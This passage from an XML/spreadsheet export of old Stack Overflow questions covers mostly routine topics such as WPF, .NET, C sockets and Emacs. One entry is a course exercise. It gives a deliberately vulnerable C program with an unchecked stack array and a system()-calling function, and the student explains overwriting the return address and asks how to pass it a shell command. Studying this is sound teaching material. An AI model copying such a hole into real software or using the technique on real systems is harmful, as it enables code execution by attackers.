&lt;p&gt;The entry text the user selected will convert to &lt;code&gt;(link: selected_text)&lt;/code&gt;. I do it with JavaScript. And after that, when he clicks the Save button to save all his entry, I don't know how to store &lt;code&gt;(link: selected_text)&lt;/code&gt; in tha database.&lt;/p&gt;
&lt;p&gt;The URL will be like this: &lt;code&gt;www.mysite.aspx?t=selected_text&lt;/code&gt;. &lt;/p&gt;
&lt;p&gt;I can convert &lt;code&gt;(link: selected_text)&lt;/code&gt; by using replace function in code-behind. But then I don't know how to show user as clickable and also by not showing &lt;code&gt;&amp;lt;a href="www.mysite.aspx?t=selected_text"&amp;gt;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;It can be difficult to understand therefore I will show some of my codes to explain.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Private Sub Save(ByVal Entry As String) ' Entry Comes from entry textbox '
  Dim elected As String
  selected = Entry.Replace("(link: ", "&amp;lt;a href http://www.mysite.com?link=")
  selected = Entry.Replace(")", "&amp;gt;")
  ' then here starts save but not necessary to show '
End Sub
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Win32: How to use RegisterTypeLib API from standard user</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The Win32 API call &lt;a href="http://msdn.microsoft.com/en-us/library/ms221570.aspx" rel="nofollow"&gt;RegisterTypeLib()&lt;/a&gt; is used to create the registry keys necessary to register a type library.&lt;/p&gt;
&lt;p&gt;Unfortunatly, on Windows XP, it tries to write those registry key entries to &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;HKEY_CLASSES_ROOT\TypeLib
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;rather than &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;HKEY_CURRENT_USER\Software\Classes\TypeLib
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Meaning that a standard user will not be able to run an ActiveX.&lt;/p&gt;
&lt;p&gt;In May 2008 Microsoft released a &lt;a href="http://support.microsoft.com/kb/935200" rel="nofollow"&gt;hotfix for Vista&lt;/a&gt; to correct this issue - but the problem remains on Windows XP.&lt;/p&gt;
&lt;p&gt;What's a standard-user friendly developer to do?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;h2&gt;Answer 1&lt;/h2&gt;
&lt;p&gt;Use the API call that is designed for it:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/ms221504.aspx" rel="nofollow"&gt;RegisterTypeLibraryForUser()&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;Answer 2&lt;/h2&gt;
&lt;p&gt;If you can't fix it, hack it:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//begin hack
HKEY key;
RegOpenKeyW(HKEY_CURRENT_USER, @"Software\Classes", out key);
RegOverridePredefKey(HKEY_CLASSES_ROOT, key);
//do original work
RegisterTypeLibrary(...)
//stop hacking
RegOverridePredefKey(HKEY_CLASSES_ROOT, null);
RegCloseKey(key);
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Compact Framework - any implementation of the Image.FromStream (Stream, Boolean, Boolean)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a .NET CF application I wrote, one of the features is to acquire frames from remote cameras. Frames are acquired as single jpeg images and displayed on the screen when available.&lt;/p&gt;
&lt;p&gt;It was a good enough solution, but I don't like the fact that the time needed to convert the stream into an &lt;code&gt;Image&lt;/code&gt; object, with the &lt;code&gt;Bitmap()&lt;/code&gt; constructor, is &lt;em&gt;far far far larger&lt;/em&gt; than the time needed to download the stream.&lt;/p&gt;
&lt;p&gt;When I surfed some blogs to search about this issue, I found that some developers were using the &lt;code&gt;Image.FromStream()&lt;/code&gt; method which has a &lt;code&gt;validateImageData&lt;/code&gt; flag that seems to control some validation code. When &lt;code&gt;validateImageData&lt;/code&gt; is false, the conversion gets dramatically faster.&lt;/p&gt;
&lt;p&gt;Good, I thought .... but the Compact Framework does not implement this method !&lt;/p&gt;
&lt;p&gt;Anyone knows how to get around it, or at least how to convert a stream into an &lt;code&gt;Image&lt;/code&gt; without unnecessary delays ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to create a 'global event' in actionscript / flex?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to create a 'global event' in flex/actionscript - preferably using a static class?&lt;/p&gt;
&lt;p&gt;I want to raise an event to indicate that a stylesheet is loaded in order to show components that require that stylesheet. So I want each portion of the application that requires a style from the stylesheet to listen to an event telling it that the styles are all loaded.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there any good replacement for SharePoint Designer?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If you've ever used SharePoint Designer, you'll know it's bad. Really bad.&lt;/p&gt;
&lt;p&gt;Is there any good replacement for that? Is there any consideration I must take account of if I want to build my own Visual Studio Add-in connector to connect to it?&lt;/p&gt;
&lt;p&gt;Anything you know that I should be aware of?&lt;/p&gt;
&lt;p&gt;I just hate the slowness and the way SPD (SharePoint Designer) just keeps reformating all my stuff.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Automatically wrapping I-search?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Vim I can &lt;code&gt;:set wrapscan&lt;/code&gt; so that when I do an incremental search, the cursor jumps to the first match whether the first match is above or below the cursor.&lt;/p&gt;
&lt;p&gt;In Emacs, if I start a search via &lt;code&gt;C-s&lt;/code&gt;, the search fails saying &lt;em&gt;Failing I-search&lt;/em&gt; if the first match is above the cursor.  If I hit &lt;code&gt;C-s&lt;/code&gt; again it then wraps the search, saying &lt;em&gt;Wrapped I-search&lt;/em&gt;.  How do I wrap and jump the cursor by default as in Vim, without having to &lt;code&gt;C-s&lt;/code&gt; a second time?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Representing Monetary Values in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I understand that BigDecimal is recommended best practice for representing monetary values in Java. What do you use? Is there a better library that you prefer to use instead?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>programatically convert word docx to doc without using ole automation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i'm looking for a way to programatically convert word documents in docx format to doc format without using ole automation.  i already have a windows service that does this but it means installing office on a server and it is a little unreliable and not supported.  i am aware of the aspose.words product, and i will try it out, but has anyone any recommendations for how to do this as simply, reliably, and cheaply as possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What techniques can you use to profile your code</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Some of the platforms that I develop on, don't have profiling tools.  I am looking for suggestions/techniques that you have personally used to help you identify hotspots, without the use of a profiler.&lt;/p&gt;
&lt;p&gt;The target language is C++.&lt;/p&gt;
&lt;p&gt;I am interested in what you have personally used.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WPF Binding to Grid Column Width</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm attempting to bind a &lt;code&gt;DependancyProperty&lt;/code&gt; in one of my usercontrols to the &lt;code&gt;Width&lt;/code&gt; property of a &lt;code&gt;Column&lt;/code&gt; in a &lt;code&gt;Grid&lt;/code&gt;. &lt;/p&gt;
&lt;p&gt;I have code similar to this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Grid x:Name="MyGridName"&amp;gt;
    &amp;lt;Grid.ColumnDefinitions&amp;gt;
        &amp;lt;ColumnDefinition x:Name="TitleSection" Width="100" /&amp;gt;
        &amp;lt;ColumnDefinition Width="*" /&amp;gt;
    &amp;lt;/Grid.ColumnDefinitions&amp;gt;
    &amp;lt;Grid.RowDefinitions&amp;gt;...&amp;lt;/Grid.RowDefinitions&amp;gt;
    &amp;lt;GridSplitter x:Name="MyGridSplitter" Grid.Row="0" Grid.Column="0" ... /&amp;gt;
&amp;lt;/Grid&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In a separate Usercontrol I have the following&lt;code&gt;DependancyProperty&lt;/code&gt; defined.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static readonly DependencyProperty TitleWidthProperty = DependencyProperty.Register("TitleWidth", typeof(int), typeof(MyUserControl));
public int TitleWidth
{
    get { return (int)base.GetValue(TitleWidthProperty); }
    set { base.SetValue(TitleWidthProperty, value); }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am creating instances of the Usercontrol in code, hence I have a binding statement similar to this :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;MyUserControl Cntrl = new MyUserControl(/* Construction Params */);
BindingOperations.SetBinding(Cntrl , MyUserControl.AnotherProperty, new Binding { ElementName = "objZoomSlider", Path = new PropertyPath("Value"), Mode = BindingMode.OneWay });
BindingOperations.SetBinding(Cntrl , MyUserControl.TitleWidthProperty, new Binding { ElementName = "TitleSection", Path = new PropertyPath("ActualWidth"), Mode = BindingMode.OneWay });
/* Other operations on Cntrl */
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The first binding defined works fantastically, although that is binding to an actual UIElement (in this case a Slider), but the Binding to "TitleSection" (which is the ColumnDefinition defined in the Grid) fails. Putting a breakpoint in the code and doing a watch on "TitleSection" returns the expected object. &lt;/p&gt;
&lt;p&gt;I am beginning to suspect that a x:Name'd ColumnDefinition can't be bound to. &lt;strong&gt;Can anyone suggest how I might be able to bind to the changing width of the first column in my grid?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT #1 - To answer comments&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The databinding 'fails' in the sense that with a breakpoint set on the setter for the &lt;code&gt;TitleWidth&lt;/code&gt; property, and using the GridSplitter control to resize the first column, the breakpoint is never hit. Additionally, code I would expect to be fired when the DependancyProperty &lt;code&gt;TitleWidth&lt;/code&gt; changes does not get executed.&lt;/p&gt;
&lt;p&gt;The usercontrol is being created and added to a Stackpanel within the Grid in the &lt;code&gt;Window_Loaded&lt;/code&gt; function. I would expect that the Grid has been rendered by the time the Usercontrols are being constructed. Certainly the x:Name'd Element &lt;code&gt;TitleSection&lt;/code&gt; is watchable and has a value of &lt;code&gt;100&lt;/code&gt; when they are being constructed / before the binding is happening.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT #2 - Possibly something to do with this?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I've been having a sniff round the MSDN pages for the Grid ColumnDefinition documentation and have come across &lt;a href="http://msdn.microsoft.com/en-us/library/system.windows.gridlength.aspx" rel="nofollow"&gt;GridLength()&lt;/a&gt; but I can't get my head around how I can use this in a binding expression. I cannot use the associated GridLengthConverter as a converter in the binding code as it does not derive from IValueConverter. &lt;/p&gt;
&lt;p&gt;I am leaning towards somehow binding to the ActualWidth property of one of the cells in the Grid object. It doesn't seem as clean as binding to the column definition, but at the moment I cannot get that to work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to spawn a process and capture its STDOUT in .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to spawn a child process that is a console application, and capture its output.&lt;/p&gt;
&lt;p&gt;I wrote up the following code for a method:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string retMessage = String.Empty;
ProcessStartInfo startInfo = new ProcessStartInfo();
Process p = new Process();
startInfo.CreateNoWindow = true;
startInfo.RedirectStandardOutput = true;
startInfo.RedirectStandardInput = true;
startInfo.UseShellExecute = false;
startInfo.Arguments = command;
startInfo.FileName = exec;
p.StartInfo = startInfo;
p.Start();
p.OutputDataReceived += new DataReceivedEventHandler
(
    delegate(object sender, DataReceivedEventArgs e)
    {
        using (StreamReader output = p.StandardOutput)
        {
            retMessage = output.ReadToEnd();
        }
    }
);
p.WaitForExit();
return retMessage;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, this does not return anything. I don't believe the &lt;code&gt;OutputDataReceived&lt;/code&gt; event is being called back, or the &lt;code&gt;WaitForExit()&lt;/code&gt; command may be blocking the thread so it will never callback.&lt;/p&gt;
&lt;p&gt;Any advice?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; Looks like I was trying too hard with the callback. Doing:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;return p.StandardOutput.ReadToEnd(); 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Appears to work fine.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>irritating select() behaviour in c</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;while (xxx) {
    timeout.tv_sec=TIMEOUT;
    timeout.tv_usec=0;
    FD_ZERO(&amp;amp;set); 
    FD_SET(sd,&amp;amp;set);
    switch (select(FD_SETSIZE,&amp;amp;set,NULL,NULL,&amp;amp;timeout))
    xxxxx
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;works fine, however&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;FD_ZERO(&amp;amp;set); 
FD_SET(sd,&amp;amp;set);
while (xxx) {
    timeout.tv_sec=TIMEOUT;
    timeout.tv_usec=0;
    switch (select(FD_SETSIZE,&amp;amp;set,NULL,NULL,&amp;amp;timeout))
    xxxxx
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;doesn't. It works the first time around, but the next time it runs through the while loop it gets a timeout even if the sd socket receives data. It seems to me to be a waste of resources to have to empty and fill set every time.&lt;/p&gt;
&lt;p&gt;Anybody have a good explanation why this is, and even better, perhaps a suggestion how to avoid it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I programmatically test an HTTP connection?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using Java, how can I test that a URL is contactable, and returns a valid response?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://stackoverflow.com/about
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to avoid, that URL.equals needs access to the internet in Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The &lt;code&gt;equals()&lt;/code&gt; method of the URL class in the Java class library makes a DNS request to get the IP for the hostname, to check the two IP's for equality. This happens even for URLs that are created from the same &lt;code&gt;String&lt;/code&gt;. Is there a way to avoid this internet access?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Parse HTML via XPath</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In .Net, I found this great library, &lt;a href="http://www.codeplex.com/htmlagilitypack"&gt;HtmlAgilityPack&lt;/a&gt; that allows you  to easily parse non-well-formed HTML using XPath.  I've used this for a couple years in my .Net sites, but I've had to settle for more painful libraries for my Python, Ruby and other projects.  Is anyone aware of similar libraries for other languages?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What do I need to change to allow my IIS7 ASP.Net 3.5 application to create an event source and log events to Windows EventLog?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;ASP.Net 3.5 running under IIS 7 doesn't seem to allow this out of the box.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        if (!EventLog.SourceExists("MyAppLog"))
            EventLog.CreateEventSource("MyAppLog", "Application");
        EventLog myLog = new EventLog();
        myLog.Source = "MyAppLog";
        myLog.WriteEntry("Message");
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Stack Overflow Exploit in C</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The question is actually about stack overflows in C. 
I have an assigment that I can not get done for the life of me, I've looked at everything in the gdb and I just cant figure it.&lt;/p&gt;
&lt;p&gt;The question is the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int i,n;
void confused()
{
    printf("who called me");
    exit(0);
}
void shell_call(char *c)
{
    printf(" ***Now calling \"%s\" shell command *** \n",c);
    system(c);
    exit(0);
}
void victim_func()
{
    int a[4];
    printf("[8]:%x\n", &amp;amp;a[8]);
    printf("Enter n: "); scanf("%d",&amp;amp;n);
    printf("Enter %d HEX Values \n",n);
    for(i=0;i&amp;lt;n;i++) scanf("%x",&amp;amp;a[i]);
    printf("Done reading junk numbers\n");
}
int main()
{
    printf("ls=736c --- ps = 7370 --- cal = 6c6163\n");
    printf("location of confused %x \n", confused);
    printf("location of shell_call %x \n", shell_call);
    victim_func();
    printf("Done, thank you\n");
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Ok, so I managed to get the first question correctly, which is to arbitrarily call one of the two functions not explicitly called in the main path. By the way, this has to be done while running the program without any modifications.
I did this by running the program, setting &lt;code&gt;N&lt;/code&gt; to &lt;code&gt;7&lt;/code&gt;, which gets me to the Function Pointer of the &lt;code&gt;victim_func&lt;/code&gt; frame, I write &lt;code&gt;a[7]&lt;/code&gt; with the memory address of confused or &lt;code&gt;shell_call&lt;/code&gt;, and it works. (I have a 64 bit machine, thats why I have to get it to 7, since the EBI pointer is 2 ints wide, instead of 1)&lt;/p&gt;
&lt;p&gt;My question is the following, how could I control which argument gets passed to the &lt;code&gt;shell_code&lt;/code&gt; funcion? ie. how do I write a &lt;code&gt;string&lt;/code&gt; to &lt;code&gt;char* c&lt;/code&gt;.
The whole point is executing unix commands like &lt;strong&gt;ps&lt;/strong&gt; etc, by running only the program.&lt;/p&gt;
&lt;p&gt;I figured writing the EBI pointer with the hex representation of &lt;strong&gt;ps&lt;/strong&gt; and setting the arg list of &lt;code&gt;shell_call&lt;/code&gt; to that, but that didn't work. I also tried inputing &lt;code&gt;argsv&lt;/code&gt; arguments and setting the arg list of &lt;code&gt;shell_call&lt;/code&gt; to the &lt;code&gt;arg_list&lt;/code&gt; of main, but didn't work either. &lt;/p&gt;
&lt;p&gt;I think the second version should work, but I believe I'm not setting the arg list of the new stack frame correctly ( I did it by writing &lt;code&gt;a[8]&lt;/code&gt; to &lt;code&gt;0&lt;/code&gt;, since its the first part of the function pointer, and writing &lt;code&gt;a[9]=736c&lt;/code&gt; and &lt;code&gt;a[10]=0000&lt;/code&gt;, but its probably not right since those are the parameters of &lt;code&gt;victim_func&lt;/code&gt;. So how do I access the parameters of &lt;code&gt;shell_call&lt;/code&gt;? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to split a web address</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I'm using python to do some parsing of web pages and I want to split the full web address into two parts. Say I have the address &lt;a href="http://www.stackoverflow.com/questions/ask" rel="nofollow"&gt;http://www.stackoverflow.com/questions/ask&lt;/a&gt;. I would need the protocol and domain (e.g. &lt;a href="http://www.stackoverflow.com" rel="nofollow"&gt;http://www.stackoverflow.com&lt;/a&gt;) and the path (e.g. /questions/ask). I figured this might be solved by some regex, however I'm not so handy with that. Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Alternative to StyleCop for Visual Studio?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I like &lt;a href="http://code.msdn.microsoft.com/sourceanalysis"&gt;StyleCop&lt;/a&gt;'s static code analysis and rules enforcement.  However, it is severely lacking in several key departments.  &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Adding new rules isn't officially supported and from what I hear pretty difficult.&lt;/li&gt;
&lt;li&gt;Automatic "fixing" of trivial rules violations would be nice!  Perhaps not with variable naming but with method ordering (static, etc) this would be a huge time saver.&lt;/li&gt;
&lt;li&gt;Microsofts "one-size-fits-all" approach to StyleCop is kind of restrictive.  I would like to have a custom set of rules for our in-house standards.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Is there such a commercial product out there?&lt;/p&gt;
&lt;p&gt;&lt;img src="http://blogs.interakting.co.uk/images/blogs_interakting_co_uk/dominicz/WindowsLiveWriter/MicrosoftStyleCopSourcecodeanalysisforfo_D8EF/styleCopErrors_6.gif" alt="alt text" /&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Importance of closing SQLConnection objects when using the SQLDataReader object</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My present contract engagement is at a large E-Commerce company. Their code base which has origins going back to .Net 1.0 has caught me by surprise to contain many issues that raise the level of smell beyond the last crap I took. &lt;/p&gt;
&lt;p&gt;That notwithstanding and trying to diffuse my level of distraction from it, I go along merrily trying to add in features to either fix other problems or extend more crap. Where I touch the DAL/BLL the time it will take to fix the aforementioned will be done. However I wanted to get a vote of confidence from the experts to get some assurance of not wasting the clients time or worse having my credibility voted down by touching "stuff that works".  Of course unit testing would solve or at least soften this worry. Perhaps this should also be added to the wtf.com?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Public Function GetSizeInfoBySite(ByVal siteID As String) As IList
    Dim strSQL As String = "YES INLINE SQL!! :)"
    Dim ci As CrapInfo
    Dim alAnArrayList As ArrayList
    Dim cn As New SqlConnection(ConfigurationSettings.AppSettings("ConnectionString"))
    Dim cmd As New SqlCommand(strSQL, cn)
    cmd.Parameters.Add(New SqlParameter("@MySiteID", SqlDbType.NVarChar, 2)).Value = siteID
    cn.Open()
    Dim rs As SqlDataReader = cmd.ExecuteReader(CommandBehavior.CloseConnection)
    While rs.Read()
        ci = New CategoryInfo(rs("someID"), rs("someName"))
        If IsNothing(alAnArrayList) Then
            alAnArrayList = New ArrayList
        End If
        alAnArrayList.Add(ci)
    End While
    rs.Close()
    Return CType(alAnArrayList, IList)
End Function
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Does anyone see problems with this aside from the inline SQL which makes my gut churn? At the least wouldn't you ordinarily wrap the above in a try/catch/finally which most of us knows has been around since .Net v1.0? Even better would'nt it be wise to fix with Using statements? Does the SQLDataReader close really encapsulate the connection close automagically? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a time when &amp;&amp; (AndAlso) does not matter over &amp; (And)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I am evaluating two variables and not two method calls does it matter weather I use "&amp;amp;&amp;amp;" or "&amp;amp;"&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//some logic that sets bool values
boolean X = true;
boolean Y = true;
if (X &amp;amp; Y){
   // perform some operation
}
if (X &amp;amp;&amp;amp; Y){
   // perform some operation
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Further a book I am using for C# 3.0 / .NET 3.5 only makes reference to the &amp;amp;&amp;amp; operator, is the &amp;amp; operator going away?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to password protect streaming videos with php</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to password protect quicktime streaming videos using php/.htaccess. They are being streamed using rtsp, but I can use other formats if necessary.&lt;/p&gt;
&lt;p&gt;I know how to do authentication with php, but I'm not sure how to setup authentication so that will protect the streaming files urls so that a user can't just copy the url and share it.&lt;/p&gt;
&lt;p&gt;Or am I overthinking this and I can just use a normal authentication scheme and place the files in a protected directory?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to create an automated way of monitoring to see if this application is running</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a application that should always be running. Does anyone know of a way to create an automated way of monitoring to see if this application is running (possibly using a batch file)? If it is not running, then send an email notification and start the application?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I translate init.d scripts from Ubuntu/Debian Linux to Solaris?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have several init.d scripts that I'm using to start some daemons. Most of these scripts I've found on the internet and they all use start-stop-daemon. My understanding is that "start-stop-daemon" is a command that is specific to Linux or BSD distros and is not available on Solaris.&lt;/p&gt;
&lt;p&gt;What is the best way to translate my init.d scripts from Linux to Solaris? Is there a command equivalent to start-stop-daemon that I can use, roughly?&lt;/p&gt;
&lt;p&gt;Since I'm not much of a Solaris user, I'm willing to admit upfront that I don't even know if my question is inherently invalid or not.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I print the lines in STDIN in random order in Perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to do the inverse of &lt;a href="http://www.manpagez.com/man/1/sort/" rel="nofollow"&gt;sort(1)&lt;/a&gt; : randomize every line of &lt;strong&gt;stdin&lt;/strong&gt; to &lt;strong&gt;stdout&lt;/strong&gt; in Perl. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Setting focus to a button from from text box?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a few text boxes and buttons on my form.&lt;/p&gt;
&lt;p&gt;Lets say txtBox1 is next to btnSubmit1,
txtBox2 is next to btnSubmit2,
txtBox3 is next to btnSubmit3.&lt;/p&gt;
&lt;p&gt;How can I set the focus on btnSubmit3 when the user starts to type something in txtBox3.
Meaning..... if a user type in a text box the program will know what button to fire when the user press the enter key.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to add CardSpace support to your ASP.NET application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I like the idea of CardSpace but unlike OpenID it seems like a real PITA
to support it in your ASP.NET web application. I've found many examples, even a tutorial
in one of the books I own... but it would seem a lot more is required than what they suggest.&lt;/p&gt;
&lt;p&gt;Changes to the server and such? &lt;/p&gt;
&lt;p&gt;Can someone tell me:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What I need to configure in IIS7&lt;/li&gt;
&lt;li&gt;How to implement CardSpace support without using to many 3rd party components&lt;/li&gt;
&lt;li&gt;Have you managed to get it working?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I think the complexity (or poor documentation) is one of the reasons CardSpace is lagging behind.&lt;/p&gt;
&lt;p&gt;(I'm interested in what others think about this, but lets not turn this into a flame war, I just want a solution and perhaps your thoughs in short)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Localization for Winforms from designmode?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to bind labels or items in a toolstrip to variables in Design Mode. 
I don't use the buit-in resources not the settings, so the section Data is not useful. I am taking the values out from an XML that I map to a class.&lt;/p&gt;
&lt;p&gt;I know there are many programs like: 
&lt;a href="http://www.jollans.com/tiki/tiki-index.php?page=MultilangVsNetQuickTourForms" rel="nofollow"&gt;http://www.jollans.com/tiki/tiki-index.php?page=MultilangVsNetQuickTourForms&lt;/a&gt;
but they work with compiled resx. I want to use not compiled XML.&lt;/p&gt;
&lt;p&gt;I know that programatically i can do it, i create a method (for example, UpdateUI()), and there I assign the new values like this:
this.tsBtn.Text=Class.Texts.tsBtnText;&lt;/p&gt;
&lt;p&gt;I would like something i could do from Design Mode or a more optimized way than the current one. Is there any Custom Control out there or Extension?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Large file download in background, initiated from the browser</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any reasonable method to allow users of a webapp to download large files? I'm looking for something other than the browser's built-in download dialog - the requirements are that the user initiates the download from the browser and then some other application takes over, downloads the file in background and doesn't exit when the browser is closed. It might possibly work over http, ftp or even bittorrent. Platform independence would be a nice thing to have but I'm mostly concerned with Windows.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Icon size of button in Flex</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to find the width of the icon which is embedded in a button?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What interface should I implement to create step driven events for my class?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to create a similar behavior to the data reader class but for a bespoke emailer program so that I can do the follow&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim sender As New EmailSender(emailTemplate)
While sender.Send()
  Response.Write(sender("HTMLContent"))
End While
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there an advised interface or mustInherit class to utilize the stepping functionality so that sender.Send() command prepares the next email for sending and returns true if it exists?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Profiler connection details</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When you startup a standard trace the first settings you see will be the current database connections.&lt;/p&gt;
&lt;p&gt;In my case there is about 10 entries, all of whome are the same username, however some are dateformat dmy and some are mdy. The asp website seems to pick a connection from the pool and uses it,  it appears to pick one of 3 and all are set to dmy however every connection should be mdy.  Since they are all the same username and that user is set to us_english where else might the connection be getting the dateformat entry?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Do you know eclipse plugin to change localised text into html entities?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have resource bundle with my country characters - how to change them into html entities.
I prefer plugin integrated with Eclipse to have all tools in one place.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>reference path re javascript intellisense</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to get intellisense in VS2008 in a js file, foo.js, from another js library/file I've written but cannot figure out the reference path ?syntax?/?string?&lt;/p&gt;
&lt;p&gt;The library is in a file called common.js which is in the same folder as foo.js I'm working on.&lt;/p&gt;
&lt;p&gt;Here's the paths I've tried...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/// &amp;lt;reference path="../../scripts/common.js"/&amp;gt;
/// &amp;lt;reference path="/../scripts/common.js"/&amp;gt;
/// &amp;lt;reference path="../scripts/common.js"/&amp;gt;
/// &amp;lt;reference path="/scripts/common.js"/&amp;gt;
/// &amp;lt;reference path="scripts/common.js"/&amp;gt;
/// &amp;lt;reference path="/common.js"/&amp;gt;
/// &amp;lt;reference path="../common.js"/&amp;gt;
/// &amp;lt;reference path="/common.js"/&amp;gt;
/// &amp;lt;reference path="common.js"/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What's the secret path syntax/string that I'm missing?&lt;/p&gt;
&lt;p&gt;FWIW the top path is what is set in the master page of this MVC app...like so &lt;/p&gt;
&lt;p&gt;&lt;code&gt;&amp;lt;script type="text/javascript" src="../../scripts/common.js"&amp;gt;&amp;lt;/script&amp;gt;&lt;/code&gt;&lt;/p&gt;
